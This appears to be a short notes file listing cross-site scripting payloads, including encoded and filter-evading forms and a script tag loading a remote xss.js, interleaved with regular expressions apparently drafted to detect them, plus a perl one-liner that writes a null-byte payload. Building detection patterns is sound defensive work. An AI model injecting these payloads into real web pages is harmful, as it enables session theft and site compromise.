"onmouseover="alert(144)"
<body onload="alert(1)">
<SCRIPT>alert(hello123)</SCRIPT>
<iframe src=javascript:alert(13)>
<meta http-equiv="refresh" content="0; URL=http://demo.testfire.net">
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='956013'>
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG onmouseover="alert('xxs')">
<IMG SRC="jav	ascript:alert('XSS');">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">




(?i)<(?=\w+)\w+(\s[\w\=\"\(\)\-\'\:\/\;\,\s\.]+\>|\>[\w\(\)]+<\/(?=\w+)\w+\>)




<IMG SRC=" &#14;  javascript:alert('XSS');">
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav&#x0A;ascript:alert('XSS');">



(?i)<(?=\w+)\w+(\s[\w\=\"\(\)\-\'\:\/\;\,\s\&\#\.]+\>|\>[\w\(\)]+<\/(?=\w+)\w+\>)





<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>


(?i)<(?=\w+)\w+((\/|\s)[\w\=\"\(\)\-\'\:\/\;\,\s\&\#\.]+\>|\>[\w\(\)]+<\/(?=\w+)\w+\>)



perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out